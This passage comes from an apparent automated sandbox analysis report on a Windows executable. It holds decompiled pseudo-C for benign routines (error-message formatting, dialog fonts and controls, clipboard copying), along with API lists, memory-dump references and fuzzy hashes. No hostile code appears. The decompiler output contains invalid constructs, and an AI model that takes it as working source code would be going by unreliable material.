                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
                                                                                                                                                • wcslen.MSVCRT ref: 00405303
                                                                                                                                                • wcscpy.MSVCRT ref: 00405313
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
                                                                                                                                                • wcscpy.MSVCRT ref: 0040532D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                • String ID: netmsg.dll
                                                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                                                • Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                • Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
                                                                                                                                                • Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                • Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040103E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E0040103E(void* __esi, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTW _v100;
				signed int _t14;
				int _t21;
				long _t22;
				signed int _t25;
				struct HDC__* _t27;
				intOrPtr _t33;

				_t27 = GetDC(0);
				_t14 = GetDeviceCaps(_t27, 0x5a);
				_t25 = 0x60;
				asm("cdq");
				_v8 = _t14 * 0xe / _t25;
				ReleaseDC(0, _t27);
				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
				_t21 = CreateFontIndirectW( &_v100);
				 *(__esi + 0x43c) = _t21;
				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
				_t33 =  *0x412fd0; // 0x0
				if(_t33 != 0) {
					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
				}
				return _t22;
			}











                                                                                                                                                0x0040104f
                                                                                                                                                0x00401054
                                                                                                                                                0x0040105f
                                                                                                                                                0x00401060
                                                                                                                                                0x00401065
                                                                                                                                                0x00401068
                                                                                                                                                0x0040107b
                                                                                                                                                0x00401087
                                                                                                                                                0x0040109f
                                                                                                                                                0x004010a5
                                                                                                                                                0x004010a7
                                                                                                                                                0x004010ae
                                                                                                                                                0x00000000
                                                                                                                                                0x004010c1
                                                                                                                                                0x004010c6

                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 00401049
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
                                                                                                                                                • ReleaseDC.USER32 ref: 00401068
                                                                                                                                                  • Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
                                                                                                                                                  • Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401087
                                                                                                                                                • SendDlgItemMessageW.USER32 ref: 004010A5
                                                                                                                                                • SendDlgItemMessageW.USER32 ref: 004010C1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 1274520933-168460110
                                                                                                                                                • Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                • Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
                                                                                                                                                • Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                • Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403333, Relevance: 12.2, APIs: 8, Instructions: 199windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t77;
				signed int _t91;
				signed int _t92;
				void* _t100;
				void* _t104;
				short* _t122;
				unsigned int _t128;
				intOrPtr _t131;
				signed int _t134;
				void* _t149;
				void* _t150;
				intOrPtr* _t151;
				short _t157;
				signed int _t158;

				_t132 = __ecx;
				_t75 = _a4 - 0x4e;
				_t158 = __ecx;
				if(_t75 == 0) {
					_t151 = _a12;
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
							goto L27;
						}
						_t77 =  *(_t151 + 0x14);
						__eflags = _t77 & 0x00000002;
						if((_t77 & 0x00000002) == 0) {
							L36:
							_t134 =  *(_t151 + 0x18) ^ _t77;
							__eflags = 0x0000f000 & _t134;
							if((0x0000f000 & _t134) == 0) {
								L39:
								__eflags =  *(_t151 + 0x14) & 0x00000002;
								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0x18) & 0x00000002;
								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0xc);
								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t158 + 0x48)) = 1;
								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t158 + 0x48)) = 0;
								return 1;
							}
							L37:
							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
							__eflags = _t91 & 0x00000002;
							if((_t91 & 0x00000002) != 0) {
								_t92 = _t91 & 0x0000f000;
								__eflags = _t92 - 0x1000;
								_a8 = _t92;
								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
								_a8 - 0x2000 = _a8 == 0x2000;
								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t151 + 0x18) & 0x00000002;
						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t100 = _t75 - 0xc2;
				if(_t100 == 0) {
					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
					E004031BE(_t158);
					E00405B17(_t149,  *(_t158 + 0x10), 0);
					goto L27;
				}
				_t104 = _t100 - 1;
				if(_t104 != 0) {
					goto L27;
				}
				_t128 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
					L7:
					if(_t128 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ec) {
							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ee) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t158 + 0x10), 2);
						}
						if(_a8 == 1) {
							E0040314A(_t158);
							EndDialog( *(_t158 + 0x10), 1);
						}
						return 1;
					}
					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
					_t132 = 0;
					if(_t131 <= 0) {
						L12:
						E004031BE(_t158);
						goto L13;
					}
					_t150 = 0;
					do {
						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
						 *(_t122 + 2) = _t132;
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
						_t132 = _t132 + 1;
						_t150 = _t150 + 0x14;
						 *_t122 = _t157;
					} while (_t132 < _t131);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004030F2(__ecx, __ecx);
						goto L7;
					}
				}
			}




















                                                                                                                                                0x00403333
                                                                                                                                                0x00403339
                                                                                                                                                0x0040333f
                                                                                                                                                0x00403341
                                                                                                                                                0x00403481
                                                                                                                                                0x00403484
                                                                                                                                                0x0040348d
                                                                                                                                                0x0040348f
                                                                                                                                                0x00403492
                                                                                                                                                0x00403499
                                                                                                                                                0x0040349f
                                                                                                                                                0x00403492
                                                                                                                                                0x004034a0
                                                                                                                                                0x004034a4
                                                                                                                                                0x00403478
                                                                                                                                                0x00403478
                                                                                                                                                0x00000000
                                                                                                                                                0x004034a6
                                                                                                                                                0x004034a6
                                                                                                                                                0x004034a9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004034ab
                                                                                                                                                0x004034ae
                                                                                                                                                0x004034b5
                                                                                                                                                0x004034bd
                                                                                                                                                0x004034c0
                                                                                                                                                0x004034c2
                                                                                                                                                0x004034c4
                                                                                                                                                0x00403511
                                                                                                                                                0x00403511
                                                                                                                                                0x00403515
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040351b
                                                                                                                                                0x0040351f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00403529
                                                                                                                                                0x00403537
                                                                                                                                                0x00403545
                                                                                                                                                0x00403553
                                                                                                                                                0x00403571
                                                                                                                                                0x00403574
                                                                                                                                                0x0040357a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040357d
                                                                                                                                                0x004034c6
                                                                                                                                                0x004034d0
                                                                                                                                                0x004034d8
                                                                                                                                                0x004034da
                                                                                                                                                0x004034dc
                                                                                                                                                0x004034e0
                                                                                                                                                0x004034e8
                                                                                                                                                0x004034f3
                                                                                                                                                0x00403501
                                                                                                                                                0x0040350c
                                                                                                                                                0x0040350c
                                                                                                                                                0x00000000
                                                                                                                                                0x004034da
                                                                                                                                                0x004034b7
                                                                                                                                                0x004034bb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004034bb
                                                                                                                                                0x004034a4
                                                                                                                                                0x00403347
                                                                                                                                                0x0040334c
                                                                                                                                                0x00403460
                                                                                                                                                0x00403467
                                                                                                                                                0x00403471
                                                                                                                                                0x00000000
                                                                                                                                                0x00403477
                                                                                                                                                0x00403352
                                                                                                                                                0x00403353
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040335c
                                                                                                                                                0x00403362
                                                                                                                                                0x0040337c
                                                                                                                                                0x0040337f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040338b
                                                                                                                                                0x004033c0
                                                                                                                                                0x004033d1
                                                                                                                                                0x004033d9
                                                                                                                                                0x004033d9
                                                                                                                                                0x004033e4
                                                                                                                                                0x004033ec
                                                                                                                                                0x004033ec
                                                                                                                                                0x004033f7
                                                                                                                                                0x00403402
                                                                                                                                                0x00403408
                                                                                                                                                0x0040340f
                                                                                                                                                0x0040341a
                                                                                                                                                0x00403420
                                                                                                                                                0x0040342c
                                                                                                                                                0x00403433
                                                                                                                                                0x00403433
                                                                                                                                                0x0040343a
                                                                                                                                                0x0040343e
                                                                                                                                                0x00403448
                                                                                                                                                0x00403448
                                                                                                                                                0x00000000
                                                                                                                                                0x0040344c
                                                                                                                                                0x00403390
                                                                                                                                                0x00403393
                                                                                                                                                0x00403397
                                                                                                                                                0x004033ba
                                                                                                                                                0x004033bb
                                                                                                                                                0x00000000
                                                                                                                                                0x004033bb
                                                                                                                                                0x00403399
                                                                                                                                                0x0040339b
                                                                                                                                                0x004033a0
                                                                                                                                                0x004033a3
                                                                                                                                                0x004033aa
                                                                                                                                                0x004033af
                                                                                                                                                0x004033b0
                                                                                                                                                0x004033b5
                                                                                                                                                0x004033b5
                                                                                                                                                0x00000000
                                                                                                                                                0x0040336b
                                                                                                                                                0x00403371
                                                                                                                                                0x00000000
                                                                                                                                                0x00403377
                                                                                                                                                0x00403377
                                                                                                                                                0x00000000
                                                                                                                                                0x00403377
                                                                                                                                                0x00403371

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32 ref: 004033D7
                                                                                                                                                • GetDlgItem.USER32 ref: 004033EA
                                                                                                                                                • GetDlgItem.USER32 ref: 004033FF
                                                                                                                                                • GetDlgItem.USER32 ref: 00403417
                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00403433
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00403448
                                                                                                                                                  • Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
                                                                                                                                                  • Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114
                                                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403460
                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                • Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                • Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
                                                                                                                                                • Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                • Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403584, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t74;
				signed int _t76;
				void* _t78;
				void** _t80;
				signed int _t84;
				void* _t88;
				signed int _t89;

				_t78 = __edi;
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x44)) = __eax;
				L0040E038();
				if(__eax == 0) {
					_t80 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t80 = __eax;
				}
				 *(_t78 + 0x40) = _t80;
				_t39 =  *_t80;
				_t88 = _t39;
				if(_t88 != 0) {
					_push(_t39);
					L0040E032();
					 *_t80 = 0;
				}
				_t80[2] = _a8;
				_t41 = E0040299A(_a8);
				_t74 = 4;
				_t80[1] = _t41;
				_t42 = _t41 * _t74;
				_push( ~(0 | _t88 > 0x00000000) | _t42);
				L0040E038();
				 *_t80 = _t42;
				memset(_t42, 0, _t80[1] << 2);
				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
				_t89 =  *(_t78 + 0x44);
				if(_t89 == 0) {
					_t84 = ( *(_t78 + 0x40))[1];
					_t76 = 0x14;
					_t53 = _t84 * _t76;
					_push( ~(0 | _t89 > 0x00000000) | _t53);
					L0040E038();
					 *(_t78 + 0x44) = _t53;
					if(_t84 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
					}
					_v8 = 1;
				}
				if(E0040152F(0x448, _t78, _a4) == 1) {
					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t78 + 0x44));
					L0040E032();
					return _t47;
				}
				return _t47;
			}


















                                                                                                                                                0x00403584
                                                                                                                                                0x0040358c
                                                                                                                                                0x0040358e
                                                                                                                                                0x00403591
                                                                                                                                                0x00403594
                                                                                                                                                0x0040359c
                                                                                                                                                0x004035a4
                                                                                                                                                0x0040359e
                                                                                                                                                0x0040359e
                                                                                                                                                0x004035a0
                                                                                                                                                0x004035a0
                                                                                                                                                0x004035a6
                                                                                                                                                0x004035a9
                                                                                                                                                0x004035ab
                                                                                                                                                0x004035ad
                                                                                                                                                0x004035af
                                                                                                                                                0x004035b0
                                                                                                                                                0x004035b6
                                                                                                                                                0x004035b6
                                                                                                                                                0x004035bc
                                                                                                                                                0x004035bf
                                                                                                                                                0x004035c8
                                                                                                                                                0x004035c9
                                                                                                                                                0x004035cc
                                                                                                                                                0x004035d5
                                                                                                                                                0x004035d6
                                                                                                                                                0x004035e4
                                                                                                                                                0x004035e6
                                                                                                                                                0x004035f4
                                                                                                                                                0x004035f9
                                                                                                                                                0x004035fc
                                                                                                                                                0x00403601
                                                                                                                                                0x00403608
                                                                                                                                                0x0040360b
                                                                                                                                                0x00403614
                                                                                                                                                0x00403615
                                                                                                                                                0x0040361d
                                                                                                                                                0x00403620
                                                                                                                                                0x00403622
                                                                                                                                                0x00403624
                                                                                                                                                0x00403627
                                                                                                                                                0x0040362f
                                                                                                                                                0x00403632
                                                                                                                                                0x00403632
                                                                                                                                                0x00403624
                                                                                                                                                0x00403635
                                                                                                                                                0x00403635
                                                                                                                                                0x0040364d
                                                                                                                                                0x00403655
                                                                                                                                                0x00403662
                                                                                                                                                0x00403662
                                                                                                                                                0x0040366b
                                                                                                                                                0x00403676
                                                                                                                                                0x00403678
                                                                                                                                                0x0040367b
                                                                                                                                                0x00000000
                                                                                                                                                0x00403680
                                                                                                                                                0x00403682

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                • Opcode ID: 0d7410a7d3b8ba2267d52b6ad2d59f04a83aa0d6c30b0f4fbf032bbb816a3573
                                                                                                                                                • Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
                                                                                                                                                • Opcode Fuzzy Hash: 0d7410a7d3b8ba2267d52b6ad2d59f04a83aa0d6c30b0f4fbf032bbb816a3573
                                                                                                                                                • Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004054F1, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E004054F1(void* _a4) {
				int _t7;
				signed int _t12;
				int _t14;
				void* _t18;
				signed int _t20;
				void* _t23;

				_t23 = _a4;
				_t20 = 0;
				EmptyClipboard();
				if(_t23 != 0) {
					_t7 = wcslen(_t23);
					_t3 = _t7 + 2; // 0x2
					_t14 = _t7 + _t3;
					_t18 = GlobalAlloc(0x2000, _t14);
					if(_t18 != 0) {
						memcpy(GlobalLock(_t18), _t23, _t14);
						GlobalUnlock(_t18);
						_t12 = SetClipboardData(0xd, _t18);
						asm("sbb esi, esi");
						_t20 =  ~( ~_t12);
					}
				}
				CloseClipboard();
				return _t20;
			}









                                                                                                                                                0x004054f2
                                                                                                                                                0x004054f7
                                                                                                                                                0x004054f9
                                                                                                                                                0x00405501
                                                                                                                                                0x00405506
                                                                                                                                                0x0040550c
                                                                                                                                                0x0040550c
                                                                                                                                                0x0040551c
                                                                                                                                                0x00405520
                                                                                                                                                0x0040552c
                                                                                                                                                0x00405535
                                                                                                                                                0x0040553e
                                                                                                                                                0x00405548
                                                                                                                                                0x0040554a
                                                                                                                                                0x0040554a
                                                                                                                                                0x0040554d
                                                                                                                                                0x0040554e
                                                                                                                                                0x00405558

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                • wcslen.MSVCRT ref: 00405506
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                • GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                • memcpy.MSVCRT ref: 0040552C
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                • SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                • CloseClipboard.USER32 ref: 0040554E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1213725291-0
                                                                                                                                                • Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
                                                                                                                                                • Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
                                                                                                                                                • Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
                                                                                                                                                • Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004078E1, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t77;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				signed short _t96;
				void* _t98;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t147;

				_t143 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t133 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
				E0040768E(__eax);
				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
				_t137 = 0xb;
				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
				_t126 = 0x14;
				_t75 = _t137 * _t126;
				 *(_t133 + 0x2e0) = _t137;
				_push( ~(0 | _t143 > 0x00000000) | _t75);
				L0040E038();
				 *(_t133 + 0x2e4) = _t75;
				_t128 = 0x14;
				_t77 = _t137 * _t128;
				_push( ~(0 | _t143 > 0x00000000) | _t77);
				L0040E038();
				_t98 = 0x4120c0;
				 *(_t133 + 0x48) = _t77;
				_v8 = 0x4120c0;
				do {
					_t139 =  *_t98 * 0x14;
					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
					_t24 = _t98 + 0x14; // 0x4120d4
					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
					_t142 = _t142 + 0x18;
					_v12 = _t86;
					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
					if((_t86 & 0xffff0000) == 0) {
						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
						_t96 = E00406827(_v12 | 0x00010000);
						_t98 = _v8;
						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
					}
					_t98 = _t98 + 0x28;
					_t147 = _t98 - 0x412278;
					_v8 = _t98;
				} while (_t147 < 0);
				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
				_t88 = 0xb;
				_t130 = 4;
				 *(_t133 + 0x34) = _t88;
				_t89 = _t88 * _t130;
				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
				_push( ~(0 | _t147 > 0x00000000) | _t89);
				L0040E038();
				_push(0xc);
				 *(_t133 + 0x38) = _t89;
				L0040E038();
				_t140 = _t89;
				if(_t89 == 0) {
					_t90 = 0;
					__eflags = 0;
				} else {
					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
				}
				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
				 *((intOrPtr*)(_t133 + 0x54)) = 1;
				 *((intOrPtr*)(_t133 + 0x58)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
				return E00407861(_t133);
			}

























                                                                                                                                                0x004078e1
                                                                                                                                                0x004078e4
                                                                                                                                                0x004078e5
                                                                                                                                                0x004078e9
                                                                                                                                                0x004078f4
                                                                                                                                                0x004078f7
                                                                                                                                                0x004078ff
                                                                                                                                                0x00407905
                                                                                                                                                0x00407906
                                                                                                                                                0x00407910
                                                                                                                                                0x00407913
                                                                                                                                                0x00407918
                                                                                                                                                0x00407922
                                                                                                                                                0x00407923
                                                                                                                                                0x00407928
                                                                                                                                                0x00407932
                                                                                                                                                0x00407935
                                                                                                                                                0x0040793e
